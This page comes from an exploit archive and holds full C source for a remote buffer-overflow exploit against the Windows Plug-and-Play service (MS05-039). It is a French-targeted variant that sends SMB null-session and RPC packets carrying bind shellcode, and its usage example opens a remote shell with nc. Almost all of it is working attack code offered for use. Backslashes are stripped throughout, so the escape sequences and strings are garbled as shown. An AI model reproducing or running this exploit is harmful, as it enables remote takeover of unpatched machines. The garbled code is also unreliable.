[Exploit]  [Remote]  [Local]  [Web Apps]  [Dos/Poc]  [Shellcode]  [RSS]

# Title : MS Windows Plug-and-Play Service Remote Universal Exploit (french fix)
# Published : 2005-08-25
# Author : Fabrice Mourron
# Previous Title : Golden FTP Server Pro 2.52 Remote Buffer Overflow Exploit (3rd)
# Next Title : Solaris <= 10 LPD Arbitrary File Delete Exploit (metasploit) 


/*
 * HOD-ms05039-pnp-expl-french.c [25.Aug.2005]
 * Very slightly modified version by Fabrice MOURRON <fmourron@exaprobe.com>
 * Tested on Win2k SP4 Frencg
 * Original credits & comments follow.
 */


/* HOD-ms05039-pnp-expl.c: 2005-08-10: PUBLIC v.0.2
 *
 * Copyright (c) 2005 houseofdabus.
 *
 * (MS05-039) Microsoft Windows Plug-and-Play Service Remote Overflow
 * Universal Exploit + no crash shellcode
 *
 *
 *
 *
 *                 .::[ houseofdabus ]::.
 *
 *
 *
 * ---------------------------------------------------------------------
 * Description:
 *    A remote code execution and local elevation of privilege
 *    vulnerability exists in Plug and Play that could allow an
 *    attacker who successfully exploited this vulnerability to take
 *    complete control of the affected system.
 *
 *    This is a remote code execution and local privilege elevation
 *    vulnerability. On Windows 2000, an anonymous attacker could
 *    remotely try to exploit this vulnerability.
 *
 *    On Windows XP Service Pack 1, only an authenticated user could
 *    remotely try to exploit this vulnerability.
 *    On Window XP Service Pack 2 and Windows Server 2003, only an
 *    administrator can remotely access the affected component.
 *    Therefore, on Windows XP Service Pack 2 and Windows Server 2003,
 *    this is strictly a local privilege elevation vulnerability.
 *    An anonymous user cannot remotely attempt to exploit this
 *    vulnerability on Windows XP Service Pack 2 and Windows
 *    Server 2003.
 *
 * ---------------------------------------------------------------------
 * Solution:
 *    http://www.microsoft.com/technet/security/Bulletin/MS05-039.mspx
 *
 * ---------------------------------------------------------------------
 * Systems Affected:
 *    - Windows Server 2003, SP1
 *    - Windows XP SP1, SP2
 *    - Windows 2000 SP4
 *
 * ---------------------------------------------------------------------
 * Tested on:
 *    - Windows 2000 SP4
 *
 * ---------------------------------------------------------------------
 * Compile:
 *
 * Win32/VC++  : cl -o HOD-ms05039-pnp-expl HOD-ms05039-pnp-expl.c
 * Win32/cygwin: gcc -o HOD-ms05039-pnp-expl HOD-ms05039-pnp-expl.c
 * Linux       : gcc -o HOD-ms05039-pnp-expl HOD-ms05039-pnp-expl.c
 *
 * ---------------------------------------------------------------------
 * Example:
 *
 * C:>HOD-ms05039-pnp-expl 192.168.0.1 7777
 *
 * [*] connecting to 192.168.0.22:445...ok
 * [*] null session...ok
 * [*] bind pipe...ok
 * [*] sending crafted packet...ok
 * [*] check your shell on 192.168.0.1:7777
 * Ctrl+C
 *
 * C:>nc 192.168.0.1 7777
 *
 * Microsoft Windows 2000 [Version 5.00.2195]
 * (C) Copyright 1985-2000 Microsoft Corp.
 *
 * C:WINNTsystem32>
 *
 * ---------------------------------------------------------------------
 *
 * This is provided as proof-of-concept code only for educational
 * purposes and testing by authorized individuals with permission
 * to do so.
 *
 */

/* #define _WIN32 */

#include <stdio.h>
#include <stdlib.h>
#include <string.h>

#ifdef _WIN32
#include <winsock2.h>
#pragma comment(lib, "ws2_32")
#else
#include <sys/types.h>
#include <netinet/in.h>
#include <sys/socket.h>
#include <netdb.h>
#endif


unsigned char SMB_Negotiate[] =
	"x00x00x00x85xFFx53x4Dx42x72x00x00x00x00x18x53xC8"
	"x00x00x00x00x00x00x00x00x00x00x00x00x00x00xFFxFE"
	"x00x00x00x00x00x62x00x02x50x43x20x4Ex45x54x57x4F"
	"x52x4Bx20x50x52x4Fx47x52x41x4Dx20x31x2Ex30x00x02"
	"x4Cx41x4Ex4Dx41x4Ex31x2Ex30x00x02x57x69x6Ex64x6F"
	"x77x73x20x66x6Fx72x20x57x6Fx72x6Bx67x72x6Fx75x70"
	"x73x20x33x2Ex31x61x00x02x4Cx4Dx31x2Ex32x58x30x30"
	"x32x00x02x4Cx41x4Ex4Dx41x4Ex32x2Ex31x00x02x4Ex54"
	"x20x4Cx4Dx20x30x2Ex31x32x00";


unsigned char SMB_SessionSetupAndX[] =
	"x00x00x00xA4xFFx53x4Dx42x73x00x00x00x00x18x07xC8"
	"x00x00x00x00x00x00x00x00x00x00x00x00x00x00xFFxFE"
	"x00x00x10x00x0CxFFx00xA4x00x04x11x0Ax00x00x00x00"
	"x00x00x00x20x00x00x00x00x00xD4x00x00x80x69x00x4E"
	"x54x4Cx4Dx53x53x50x00x01x00x00x00x97x82x08xE0x00"
	"x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00"
	"x57x00x69x00x6Ex00x64x00x6Fx00x77x00x73x00x20x00"
	"x32x00x30x00x30x00x30x00x20x00x32x00x31x00x39x00"
	"x35x00x00x00x57x00x69x00x6Ex00x64x00x6Fx00x77x00"
	"x73x00x20x00x32x00x30x00x30x00x30x00x20x00x35x00"
	"x2Ex00x30x00x00x00x00x00";


unsigned char SMB_SessionSetupAndX2[] =
	"x00x00x00xDAxFFx53x4Dx42x73x00x00x00x00x18x07xC8"
	"x00x00x00x00x00x00x00x00x00x00x00x00x00x00xFFxFE"
	"x00x08x20x00x0CxFFx00xDAx00x04x11x0Ax00x00x00x00"
	"x00x00x00x57x00x00x00x00x00xD4x00x00x80x9Fx00x4E"
	"x54x4Cx4Dx53x53x50x00x03x00x00x00x01x00x01x00x46"
	"x00x00x00x00x00x00x00x47x00x00x00x00x00x00x00x40"
	"x00x00x00x00x00x00x00x40x00x00x00x06x00x06x00x40"
	"x00x00x00x10x00x10x00x47x00x00x00x15x8Ax88xE0x48"
	"x00x4Fx00x44x00x00xEDx41x2Cx27x86x26xD2x59xA0xB3"
	"x5ExAAx00x88x6FxC5x57x00x69x00x6Ex00x64x00x6Fx00"
	"x77x00x73x00x20x00x32x00x30x00x30x00x30x00x20x00"
	"x32x00x31x00x39x00x35x00x00x00x57x00x69x00x6Ex00"
	"x64x00x6Fx00x77x00x73x00x20x00x32x00x30x00x30x00"
	"x30x00x20x00x35x00x2Ex00x30x00x00x00x00x00";


unsigned char SMB_TreeConnectAndX[] =
	"x00x00x00x5AxFFx53x4Dx42x75x00x00x00x00x18x07xC8"
	"x00x00x00x00x00x00x00x00x00x00x00x00x00x00xFFxFE"
	"x00x08x30x00x04xFFx00x5Ax00x08x00x01x00x2Fx00x00";



unsigned char SMB_TreeConnectAndX_[] =
	"x00x00x3Fx3Fx3Fx3Fx3Fx00";


/* browser */
unsigned char SMB_PipeRequest_browser[] =
	"x00x00x00x66xFFx53x4Dx42xA2x00x00x00x00x18x07xC8"
	"x00x00x00x00x00x00x00x00x00x00x00x00x00x08x78x04"
	"x00x08x40x00x18xFFx00xDExDEx00x10x00x16x00x00x00"
	"x00x00x00x00x9Fx01x02x00x00x00x00x00x00x00x00x00"
	"x00x00x00x00x00x00x00x00x01x00x00x00x40x00x00x00"
	"x02x00x00x00x03x13x00x00x5Cx00x62x00x72x00x6Fx00"
	"x77x00x73x00x65x00x72x00x00x00";


unsigned char SMB_PNPEndpoint[] =
/* 8d9f4e40-a03d-11ce-8f69-08003e30051b v1.0: pnp */
	"x00x00x00x9CxFFx53x4Dx42x25x00x00x00x00x18x07xC8"
	"x00x00x00x00x00x00x00x00x00x00x00x00x00x08x78x04"
	"x00x08x50x00x10x00x00x48x00x00x00x00x10x00x00x00"
	"x00x00x00x00x00x00x00x00x00x54x00x48x00x54x00x02"
	"x00x26x00x00x40x59x00x00x5Cx00x50x00x49x00x50x00"
	"x45x00x5Cx00x00x00x40x00x05x00x0Bx03x10x00x00x00"
	"x48x00x00x00x01x00x00x00xB8x10xB8x10x00x00x00x00"
	"x01x00x00x00x00x00x01x00x40x4Ex9Fx8Dx3DxA0xCEx11"
	"x8Fx69x08x00x3Ex30x05x1Bx01x00x00x00x04x5Dx88x8A"
	"xEBx1CxC9x11x9FxE8x08x00x2Bx10x48x60x02x00x00x00";



unsigned char RPC_call[] =
	"x00x00x08x90xFFx53x4Dx42x25x00x00x00x00x18x07xC8"
	"x00x00x00x00x00x00x00x00x00x00x00x00x00x08x78x04"
	"x00x08x60x00x10x00x00x3Cx08x00x00x00x01x00x00x00"
	"x00x00x00x00x00x00x00x00x00x54x00x3Cx08x54x00x02"
	"x00x26x00x00x40x4Dx08x00x5Cx00x50x00x49x00x50x00"
	"x45x00x5Cx00x00x00x40x00x05x00x00x03x10x00x00x00"
	"x3Cx08x00x00x01x00x00x00x24x08x00x00x00x00x36x00"
	"x11x00x00x00x00x00x00x00x11x00x00x00x52x00x4Fx00"
	"x4Fx00x54x00x5Cx00x53x00x59x00x53x00x54x00x45x00"
	"x4Dx00x5Cx00x30x00x30x00x30x00x30x00x00x00x00x00"
	"xFFxFFx00x00xE0x07x00x00x00x00x00x00x00x00x00x00"
	"xC0x07x00x00x00x00x00x00x90x90x90x90x90x90x90x90"
	"xEBx08x90x90x67x15x77x76xEBx08x90x90x67x15x77x76"
	"xEBx08x90x90x67x15x77x76xEBx08x90x90x67x15x77x76"
	"xEBx08x90x90x67x15x77x76xEBx08x90x90x67x15x77x76"
	"xEBx08x90x90x67x15x77x76xEBx08x90x90x67x15x77x76"

	/* jmp over - entry point */
	"xEBx08x90x90"

	/* pop reg; pop reg; retn; - umpnpmgr.dll for french*/
	"x67x15x74x76" /* 0x76741567 */

	/* jmp ebx - umpnpmgr.dll (BROKEN)
	"x6fx36x77x76" */

	"xEBx08x90x90x67x15x77x76"
	"x90x90x90x90x90x90x90xEBx08x90x90x48x4Fx44x88x90"
	"x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90";


unsigned char RPC_call_end[] =
	"xE0x07x00x00x04x00x00x00x00x00x00x00";


unsigned char bind_shellcode[] =
	"x29xc9x83xe9xb0xd9xeexd9x74x24xf4x5bx81x73x13x19"
	"xf5x04x37x83xebxfcxe2xf4xe5x9fxefx7axf1x0cxfbxc8"
	"xe6x95x8fx5bx3dxd1x8fx72x25x7ex78x32x61xf4xebxbc"
	"x56xedx8fx68x39xf4xefx7ex92xc1x8fx36xf7xc4xc4xae"
	"xb5x71xc4x43x1ex34xcex3ax18x37xefxc3x22xa1x20x1f"
	"x6cx10x8fx68x3dxf4xefx51x92xf9x4fxbcx46xe9x05xdc"
	"x1axd9x8fxbex75xd1x18x56xdaxc4xdfx53x92xb6x34xbc"
	"x59xf9x8fx47x05x58x8fx77x11xabx6cxb9x57xfbxe8x67"
	"xe6x23x62x64x7fx9dx37x05x71x82x77x05x46xa1xfbxe7"
	"x71x3exe9xcbx22xa5xfbxe1x46x7cxe1x51x98x18x0cx35"
	"x4cx9fx06xc8xc9x9dxddx3execx58x53xc8xcfxa6x57x64"
	"x4axa6x47x64x5axa6xfbxe7x7fx9dx1ax55x7fxa6x8dxd6"
	"x8cx9dxa0x2dx69x32x53xc8xcfx9fx14x66x4cx0axd4x5f"
	"xbdx58x2axdex4ex0axd2x64x4cx0axd4x5fxfcxbcx82x7e"
	"x4ex0axd2x67x4dxa1x51xc8xc9x66x6cxd0x60x33x7dx60"
	"xe6x23x51xc8xc9x93x6ex53x7fx9dx67x5ax90x10x6ex67"
	"x40xdcxc8xbexfex9fx40xbexfbxc4xc4xc4xb3x0bx46x1a"
	"xe7xb7x28xa4x94x8fx3cx9cxb2x5ex6cx45xe7x46x12xc8"
	"x6cxb1xfbxe1x42xa2x56x66x48xa4x6ex36x48xa4x51x66"
	"xe6x25x6cx9axc0xf0xcax64xe6x23x6exc8xe6xc2xfbxe7"
	"x92xa2xf8xb4xddx91xfbxe1x4bx0axd4x5fxf6x3bxe4x57"
	"x4ax0axd2xc8xc9xf5x04x37";

#define SET_PORTBIND_PORT(buf, port) 
	*(unsigned short *)(((buf)+186)) = (port)


void
convert_name(char *out, char *name)
{
	unsigned long len;

	len = strlen(name);
	out += len * 2 - 1;
	while (len--) {
		*out-- = 'x00';
		*out-- = name[len];
	}
}



int
main (int argc, char **argv)
{
	struct sockaddr_in addr;
	struct hostent *he;
	int len;
	int sockfd;
	unsigned short smblen;
	unsigned short bindport;
	unsigned char tmp[1024];
	unsigned char packet[4096];
	unsigned char *ptr;
	char recvbuf[4096];

#ifdef _WIN32
	WSADATA wsa;
	WSAStartup(MAKEWORD(2,0), &wsa);
#endif

	printf("n      (MS05-039) Microsoft Windows Plug-and-Play Service Remote Overflown");
	printf("t         Universal Exploit + no crash shellcodenn");
	printf("t         [French hack by ExaProbe :-)]nnn");
	printf("t            Copyright (c) 2005 .: houseofdabus :.nnn");


	if (argc < 3) {
		printf("%s <host> <bind port>n", argv[0]);
		exit(0);
	}

	if ((he = gethostbyname(argv[1])) == NULL) {
		printf("[-] Unable to resolve %sn", argv[1]);
		exit(0);
	}

	if ((sockfd = socket(AF_INET, SOCK_STREAM, 0)) < 0) {
		printf("[-] socket failedn");
		exit(0);
	}

	addr.sin_family = AF_INET;
	addr.sin_port = htons(445);
	addr.sin_addr = *((struct in_addr *)he->h_addr);
	memset(&(addr.sin_zero), '', 8);



	printf("n[*] connecting to %s:445...", argv[1]);
	if (connect(sockfd, (struct sockaddr *)&addr, sizeof(struct sockaddr)) < 0) {
		printf("n[-] connect failedn");
		exit(0);
	}
	printf("okn");

	printf("[*] null session...");
	if (send(sockfd, SMB_Negotiate, sizeof(SMB_Negotiate)-1, 0) < 0) {
		printf("n[-] send failedn");
		exit(0);
	}

	len = recv(sockfd, recvbuf, 4096, 0);
	if ((len <= 10) || (recvbuf[9] != 0)) {
		printf("n[-] failedn");
		exit(0);
	}

	if (send(sockfd, SMB_SessionSetupAndX, sizeof(SMB_SessionSetupAndX)-1, 0) < 0) {
		printf("n[-] send failedn");
		exit(0);
	}

	len = recv(sockfd, recvbuf, 4096, 0);
	if (len <= 10) {
		printf("n[-] failedn");
		exit(0);
	}

	if (send(sockfd, SMB_SessionSetupAndX2, sizeof(SMB_SessionSetupAndX2)-1, 0) < 0) {
		printf("n[-] send failedn");
		exit(0);
	}

	len = recv(sockfd, recvbuf, 4096, 0);
	if ((len <= 10) || (recvbuf[9] != 0)) {
		printf("n[-] failedn");
		exit(0);
	}

	ptr = packet;
	memcpy(ptr, SMB_TreeConnectAndX, sizeof(SMB_TreeConnectAndX)-1);
	ptr += sizeof(SMB_TreeConnectAndX)-1;

	sprintf(tmp, "\\%s\IPC$", argv[1]);
	convert_name(ptr, tmp);
	smblen = strlen(tmp)*2;
	ptr += smblen;
	smblen += 9;
	memcpy(packet + sizeof(SMB_TreeConnectAndX)-1-3, &smblen, 1);

	memcpy(ptr, SMB_TreeConnectAndX_, sizeof(SMB_TreeConnectAndX_)-1);
	ptr += sizeof(SMB_TreeConnectAndX_)-1;

	smblen = ptr-packet;
	smblen -= 4;
	memcpy(packet+3, &smblen, 1);

	if (send(sockfd, packet, ptr-packet, 0) < 0) {
		printf("n[-] send failedn");
		exit(0);
	}

	len = recv(sockfd, recvbuf, 4096, 0);
	if ((len <= 10) || (recvbuf[9] != 0)) {
		printf("n[-] failedn");
		exit(0);
	}

	printf("okn");
	printf("[*] bind pipe...");

	if (send(sockfd, SMB_PipeRequest_browser, sizeof(SMB_PipeRequest_browser)-1, 0) < 0) {
		printf("n[-] send failedn");
		exit(0);
	}

	len = recv(sockfd, recvbuf, 4096, 0);
	if ((len <= 10) || (recvbuf[9] != 0)) {
		printf("n[-] failedn");
		exit(0);
	}

	if (send(sockfd, SMB_PNPEndpoint, sizeof(SMB_PNPEndpoint)-1, 0) < 0) {
		printf("n[-] send failedn");
		exit(0);
	}

	len = recv(sockfd, recvbuf, 4096, 0);
	if ((len <= 10) || (recvbuf[9] != 0)) {
		printf("n[-] failedn");
		exit(0);
	}

	printf("okn");
	printf("[*] sending crafted packet...");

	// nop
	ptr = packet;
	memset(packet, 'x90', sizeof(packet));

	// header & offsets
	memcpy(ptr, RPC_call, sizeof(RPC_call)-1);
	ptr += sizeof(RPC_call)-1;

	// shellcode
	bindport = (unsigned short)atoi(argv[2]);
	bindport ^= 0x0437;
	SET_PORTBIND_PORT(bind_shellcode, htons(bindport));
	memcpy(ptr, bind_shellcode, sizeof(bind_shellcode)-1);

	// end of packet
	memcpy( packet + 2196 - sizeof(RPC_call_end)-1 + 2,
		RPC_call_end,
		sizeof(RPC_call_end)-1);

	// sending...
	if (send(sockfd, packet, 2196, 0) < 0) {
		printf("n[-] send failedn");
		exit(0);
	}
	printf("okn");
	printf("[*] check your shell on %s:%in", argv[1], atoi(argv[2]));

	recv(sockfd, recvbuf, 4096, 0);

return 0;
}

// www.Syue.com [2005-08-25]